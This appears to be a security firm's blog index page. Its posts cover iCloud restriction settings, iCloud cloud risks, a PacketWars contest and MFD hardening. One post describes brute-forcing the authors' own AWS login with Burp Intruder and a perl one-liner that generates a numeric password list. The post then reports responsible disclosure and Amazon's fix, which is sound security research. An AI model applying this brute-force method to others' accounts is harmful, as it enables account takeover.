Misc

Short iCloud Follow-Up

After the basic iCloud discussion in this post, I would like to add some more technical information. The following items are just a loose compilation of facts about the mentioned controls which allow the restriction of iCloud usage. The basic iCloud usage, consisting of backup, document sync, and photo stream, can be deactivated using the most recent version of the iPhone Configuration Utility:

Since there are no default settings for these values, it is necessary to include the disabled entries in existing configuration profiles.

Another new functionality which can be deactivated using configuration profiles is Siri. Even though this functionality is not directly related to the iCloud at first glance, it still bears a big threat potential. Looking at the SLAs of the iPhone 4s, the following paragraph gets relevant:
When you use Siri, the things you say will be recorded and sent to Apple to process your requests. Your device will also send Apple other information, such as your first name and nickname; the names, nicknames, and relationship with you (e.g., “my dad”) of your address book contacts; and song names in your collection (collectively, your “User Data”).

So Siri also uses cloud-based services in the background. The following screenshot shows the option to disallow the usage of Siri:

Thinking of this privacy relevant submission of data, another new option of the most recent tool version gets relevant: “Allow diagnostic data to be sent to Apple”. The two checked options in the following screenshots are also new features of the most recent version of the configuration utility:

That’s it for the short configuration option compilation of today, have a great week everybody,

Matthias

Continue reading
Building

iTrust. Or not?

A few days ago (on 10/12/2011) Apple launched its new cloud offering which is called — who would have guessed 😉 — iCloud. Since we’re performing quite some research in the area of cloud security, we had a first look at the basic functionality and concepts of the iCloud. Its main features include the possibility to store full backups of Apple devices (at least, an iPhone, iPad or iPod touch running iOS 5 or a Mac running OS X Lion 10.7.2 is required), photos, music, or documents online. The data to be stored online is initially pushed to the cloud storage and then synchronized to any device which is using the same iCloud account. From this moment on, all changes on the cloudified data is immediately synchronized to the iCloud and then pushed to all participating devices. At this point, most infosec people might start to be worried a little bit: The common cloud concept of centralized data storage on premise of a third party does not cope well with the usual control focused approach of most technical infosec guys. The resulting concerns can be attributed to several main cloud computing related risks (which are proposed by ENISA and actually very valuable work:

  • Lock In: According to the way the cloud functionality is integrated into iOS and OS X , usage of the iCloud might result in strong lock in effects. There is neither the possibility to use different backend cloud storage for the functionality nor the possibility to develop a product which provides similar functionality (see later paragraphs for examples).
  • Isolation Failure: is probably the most present threat for many IT people, since it is highly related to technical implementation details. It includes, but is not limited to, breakout attacks from guest systems due to vulnerabilities in the hypervisor or to unauthorised data access due to insufficient permission models in backend storage. Thinking of the trust factor consistency, Apple’s history of cloud based services was not their “finest hour” (as Steve Jobs stated during his keynote on iCloud). Remembering this talk and the awkward MobileMe vulnerabilities, we would agree with that 😉
  • Loss of Governance: The loss of governance over data in the cloud is kind of an intrinsic risk to cloud computing (also refer to the proposed system operation life cycle and the motivation given here). Again, referring to explanations about the technical iCloud implementation in the later paragraphs, this loss might be even more relevant in the iCloud environment.
  • Data Protection Risks: Handing over responsibility for the storage of data to the cloud service provider, a customer also hands over the possibility to protect his valuable (or more concrete: personal) data by controls of his choice. Reviewing Apple’s terms of service for the iCloud, the following paragraphs are somewhat related to data protection issues: You understand that in order to provide the Service and make your Content available thereon, Apple may transmit your Content across various public networks, in various media, and modify or change your Content to comply with technical requirements of connecting networks or devices or computers. You agree that the license herein permits Apple to take any such actions. And in addition, the Apple Privacy Policy states the following: You further consent and agree that Apple may collect, use, transmit, process and maintain information related to your Account, and any devices or computers registered thereunder, for purposes of providing the Service, and any features therein, to you., which kind of reminds of the Dropbox Terms of service which even state that they are allowed to transfer your data to anybody if it is necessary in order to assure the quality of the offered service. Thinking of the trust factor components, all of these risks are getting even more relevant since Apple relies on third party cloud services (which are Amazon Web Services and Azure, according to several sources, including this one), which conclusively must also fulfill certain security requirements in order to lower the vulnerability factors for the presented risks.

There are some more risks according to the ENISA study, but those are beyond the scope of this post. If we do such rough assessments as sample exercises during our cloud security workshops, the participants usually ask what “they can do”. Possible controls can be divided into two groups: controls to reduce the risk to a reasonable level and controls which prohibit the usage of the particular service. When analyzing the cloud, the control always mentioned first is crypto. Speaking of cloud storage, crypto is a valid control to ensure that unauthorized access (e.g. due to isolation failure/physical access/subpoena) to data has no relevant impact. The only requirement is that the encryption is performed on client side (depending on the attacker model and whether you trust your cloud service provider). For example, Amazon provides a feature which is called Server Side Encryption which encrypts any file that is stored within S3. Additionally, Amazon allows the implementation of a custom encryption client which enables customers to perform transparent encryption of all files which are stored in S3. The analysis of the security benefits, attacker models, and operational feasibility of these controls will be the subject of yet-another blogpost, but at least Amazon offers these encryption features. The offered services of the iCloud differ a little bit in functionality (for example, the iCloud iTunes version is a kind-of music streaming platform), but basically there are two API functions which allow access to the iCloud backend. First, it is possible to store documents (where documents can be complete directory structures) in the iCloud, second, a so called key-value store can be accessed. The access is encapsulated in dedicated API calls which take care of the complete data transfer, synchronization, and pushing operations using an iCloud daemon. So any use of the iCloud is strictly connected to an app (I would have called it application ;-)) which has to use the introduced iCloud API calls. Even though I’m not that familiar with the iOS/OS X architecture, I would have guessed that it would have been easily possible to add client side encryption using the internal keychain and usual cryptographic mechanisms. Still, this is not the fact and it is questionable, regarding the user experience oriented focus of Apple, whether this feature will be implemented in the future. This lack of encryption possibility brings up the second class of controls, which shall restrict the iCloud usage. This is especially important in corporate context, where full backups of devices would potentially expose sensitive corporate data to third parties. Even though the usage might be restricted by acceptable use policies, this might not enough since the activation of this feature can happen accidentally: If a user logs in once into the iCloud frontend, which is possible using a regular apple ID, the data synchronization is enabled by default and starts immediately (refer also to the quoted terms of service above). Since most corporate environments use MDM solutions, it is possible to restrict the iCloud usage at least for iOS based devices. The corresponding configuration profiles offer several options to disable the functionality:

  • allowCloudBackup
  • allowCloudDocumentSync
  • allowPhotoStream

For today, this little introduction to iCloud and some of its security and trust aspects will be finished here. We will, however, continue to explore the attributes of iCloud more deeply in the near future (and we might even have a talk on it at Troopers ;-).

So stay tuned… Matthias

Continue reading
Events

Packetwars, Sun & Skills

During the last days, some of our guys (including me) had some great days in Dayton. Rene, Christopher, Hendrik, Sergej, and me flew in to give workshops and presentations at Day-Con as well as to compete in the infamous PacketWars game. While Day-Con is a one day event, the two days before the conference comprised workshops on secure iOS integration (given by Rene) and IPv6 security (given by Christopher). Since the overall topic of the conference was trust, Rene gave a keynote on broken trust which was based exemplary trust analysis, development of a trust metric, and different trust factors. Those trust factors were also used in my talk about evaluation methodologies for cloud service providers (regular followers will recognize some of the content of both talks from different posts 😉 ). There were also talks from Sergey Bratus, Graeme Neilson and Angus Blitter. While Sergey proposed a sound (not to say academic 😉 ) definition on the classification of vulnerabilities and their connection to turing complete input languages, Angus gave an introduction to PowerLine technologies and laid out, that these technologies still suffer from naive assumptions about trusted networks (he also refered to this). The day after the conference, the ERNW Allstars had to defend their championship title in PacketWars. Since the first battle was scheduled for 10AM, we had quite some time to tan in the sunny 30°C weather, recover from the conference and prepare the expected victory celebration (some of you might remember some “Champagne tradition” from Troopers). In face of this motivation, we rushed through the 3 battles and were able to score first place second year in a row. At this point, kudos to the two other participating teams who gave us a tough battle, especially during the reversing challenges.

 

Have a great week, Matthias

Continue reading
Breaking

The Key to your Datacenter

 

During our ongoing research on the security of cloud service providers and cloud based applications, we performed a regular audit of our AWS account password. Thinking of popular incidents and evergreens in attack vectors, we were wondering which consequences an online bruteforce attack on our AWS password would have. So we decided to perform a bruteforce attack against our own account. Analyzing the login process of AWS, the following requirements for the bruteforce tool to be used could be derived:

  • Cookie Handling
  • HTTPS support
  • HTTP 3xx support.

It turned out that it was pretty hard to find a password testing tool which fulfilled these requirements and would be able to actually handle the complex AWS login process — eventually there was none. Since we use and like Burp Suite pretty much, the Intruder suggested itself as an alternative which is straight forward to configure even though it might lack the speed and efficiency of special bruteforcing tools. Using burp’s history, we were able to identify the request which triggered the login process:

After the request is sent to the Intruder, the password field is marked

and the payloads to be used are configured.

Using exemplary payloads, it is possible to identify a successful login attempt, since it results in a redirect to the authenticated area/SSO server/whatever whereas a wrong passwords results in HTTP 200 presenting the AWS login page again:

Having this basic bruteforcing process established, the wordlist to be used must be generated. To decide which complexity should be covered, the Amazon password policy must be analyzed — if the restrictions in place deserve to be called a policy. The only restriction is that the password is between 6 and 20 characters (though the upper limit was determined regarding the maxlength field parameter when changing the password using the webfrontend, since there is no documentation about this available. Thinking of business needs, this behavior might be understandable since Amazon loses “endusers” and therefore money if their password policy is too strict). So we decided to use a wordlist which contains all passwords of 6 characters consisting of numbers (which can be generated pretty easy reactivating some old perl scripting skills: perl -le ‘printf “%06d”, $_ foreach(1..999999)’ 😉 ). Such passwords even might be pretty common when thinking of “birthday passwords”.

After performing about 400k requests, we paused the attack and searched for requests which resulted in a HTTP 302 response, just as the baseline request did.

And indeed, it was possible to bruteforce the password — which is not such a big surprise though. The bigger — and worse — surprise is, that it was still possible to login to our amazon account after performing about 2 million requests (including some dry runs) within two days originating from one single IP adress without having the account locked, being throttled down or notified in any way. And we were performing about 80k requests per hour.

 

Coming back to the title of the blogpost: At the moment of our investigation, there were no protection mechanisms against bruteforce attacks for the key to your datacenter — which your AWS credentials actually can be, if you are hosting a large amount of your services in EC2. Following a repsonsible disclosure policy, we contacted the AWS Security Team and got a very comprehensive answer. As we supposed, they pointed us to their MFA solution, which is basically, even though there was a major incident recently, a viable security control when authenticating users for data center access. But in addition, we had a long and beneficial dialog about potential mechanisms such as connection throttling and account locking. The outcome of our discussion is a CAPTCHA mechanism which kicks in after a brute force attempt is detected — and was also re-tested several times by our bruteforcing attempt. It was quite impressive to see that it was possible for Amazon to implement additional security measures in such a short time frame, regarding the huge size and complexity of the AWS environment. So we were really glad to get in touch with the committed AWS Security Team and were really happy to see that those guys are really into security and trying to communicate with their customers.

Continue reading
Breaking

Sisters’ Act of MFD Security

Recently Micele and I were researching for our talk about the current state of security of Multifunction Devices (MFDs). Since we’re both seasoned pentesters who are quite familar with MFDs, we were really surprised that very little new research is going on on the topic of MFD security. While diving deeper into the topic, we found a very simple explanation for this: As in 2002, it is still possible to download print or scan jobs using PJL, many devices still offer default FTP or Telnet access, and, of course, stored files can be recovered from MFD hard drives — on an enterprise wide scale. To even strengthen our impression of the current state of MFD security, most devices crashed or did go wild while performing some scans — and we do not talk about fuzzing here.

This devastating result lead to the question how MFDs can be secured. Since there are a lot of MFD hardening resources out there, even from vendors, we decided to put together a comprehensive hardening guide for MFDs. To raise the level of awareness, we put together a lot of examples on attacks on MFDs and then focused on the development of our own MFD security guide which is based on the seven sisters. The result of this approach can be found here. And of course, soon there will be a ERNW newsletter to cover this topic in a more academic and structured way 😉

Continue reading
Misc

Intel’s Known Good Approach — Chances for a Paradigm Shift?

During the keynote of the Intel Developer Forum, Intel’s CEO Paul Otellini explained their motivation for the acquisition of McAfee. Basically, Intel wants to provide a possibility to shift computer security from a known bad model to something that is a known good model.

Coming back to some of our recent blog posts, we think that a reliable and working approach to implement application whitelisting would increase security in corporate environments — especially when thinking of the latest vulnerabilities with exploit code in the wild that could not be catched up by any AV solution. As covered by this article, the possibility that such an approach succeeds depends heavily on the critical mass that would use it. The widespread x86 architecture therefore is the perfect plattform for accomplishing a widely used known good m Continue reading “Intel’s Known Good Approach — Chances for a Paradigm Shift?”

Continue reading